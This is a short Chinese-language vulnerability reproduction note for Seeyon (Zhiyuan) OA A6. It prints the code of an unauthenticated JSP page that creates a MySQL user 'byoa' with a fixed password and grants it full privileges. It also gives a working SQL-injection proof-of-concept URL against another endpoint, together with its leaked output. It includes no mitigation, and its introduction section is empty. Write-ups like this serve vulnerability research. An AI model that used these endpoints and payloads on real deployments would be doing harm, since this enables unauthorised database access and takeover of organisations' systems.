致远OA A6 重置数据库账号密码漏洞
================================

一、漏洞简介
------------

二、漏洞影响
------------

致远OA A6

三、复现过程
------------

### 重置数据库账号密码防御

    http://www.0-sec.org/yyoa/ext/byoa/start.jsp

该文件的代码为：

    <%    Connection conn = null;    PreparedStatement pstmt = null;    String sql = "create user byoa IDENTIFIED by 'byoa'";    try {        conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection();        pstmt = conn.prepareStatement(sql);        out.print(pstmt.executeUpdate());        sql = "grant all on *.* to byoa";        pstmt = conn.prepareStatement(sql);        out.println(pstmt.executeUpdate());        pstmt.close();        sql = "update mysql.user set password=password('byoa') where user='byoa'";        pstmt = conn.prepareStatement(sql);        out.println(pstmt.executeUpdate());        pstmt.close();        sql = "flush privileges";        pstmt = conn.prepareStatement(sql);        out.print(pstmt.executeUpdate());        pstmt.close();        //conn.close();    } catch (Exception ex) {                    out.println(ex.getMessage());    }%>

可以抛光该文件没有验证任何权限，便进行了重置数据库用户byoa的密码为：byoa

### mysql + jsp注射

    http://www.0-sec.org/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp

### poc

    http://www.0-sec.org/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'